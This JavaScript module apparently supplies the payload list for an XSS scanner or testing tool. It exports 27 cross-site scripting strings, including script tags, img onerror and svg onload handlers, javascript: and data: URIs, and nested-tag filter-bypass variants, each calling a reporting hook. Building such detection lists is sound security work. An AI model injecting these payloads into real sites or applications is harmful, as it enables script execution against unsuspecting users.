export default {
  1: `<script>modom.log('#{REPORT}')</script>`,
  2: `"><script>modom.log('#{REPORT}')</script>`,
  3: `<img src=x onerror=modom.log('#{REPORT}');>`,
  4: `<img src=x onerror=modom.log('#{REPORT}')//`,
  5: `<img src=x:modom.log(alt) onerror=eval(src) alt=#{REPORT}>`,
  6: `"><img src=x onerror=modom.log('#{REPORT}');>`,
  7: `<svg\fonload=modom.log('#{REPORT}')>`,
  8: `<svg/onload=modom.log('#{REPORT}')>`,
  9: `<svg onload=modom.log('#{REPORT}')//`,
  10: `<svg id=modom.log('#{REPORT}') onload=eval(id)>`,
  11: `"><svg/onload=modom.log(/#{REPORT}/)`,
  12: `<div onpointerover="modom.log('#{REPORT}')">MOVE HERE</div>`,
  13: `<div onpointerenter="modom.log('#{REPORT}')">MOVE HERE</div>`,
  14: `<div onpointerleave="modom.log('#{REPORT}')">MOVE HERE</div>`,
  15: `<input autofocus onfocus=modom.log('#{REPORT}')>`,
  16: `<textarea autofocus onfocus=modom.log('#{REPORT}')>`,
  17: `<audio src onloadstart=modom.log('#{REPORT}')>`,
  18: `#"><img src=/ onerror=modom.log('#{REPORT}')>`,
  19: `" onerror="modom.log('#{REPORT}')`,
  20: `javascript:modom.log('#{REPORT}')`,
  21: `java%0ascript:modom.log('#{REPORT}')`,
  22: `javascript://%0Amodom.log('#{REPORT}')`,
  23: `data:text/html,<script>modom.log('#{REPORT}')</script>`,
  24: `<scr<script>ipt>modom.log('#{REPORT}')</scr</script>ipt>`,
  25: `"><scr<script>ipt>modom.log('#{REPORT}')</scr</script>ipt>`,
  26: `<scr<sc<script>ript>ipt>modom.log('#{REPORT}')</scr</sc</script>ript>ipt>`,
  27: `"><scr<sc<script>ript>ipt>modom.log('#{REPORT}')</scr</sc</script>ript>ipt>`
};
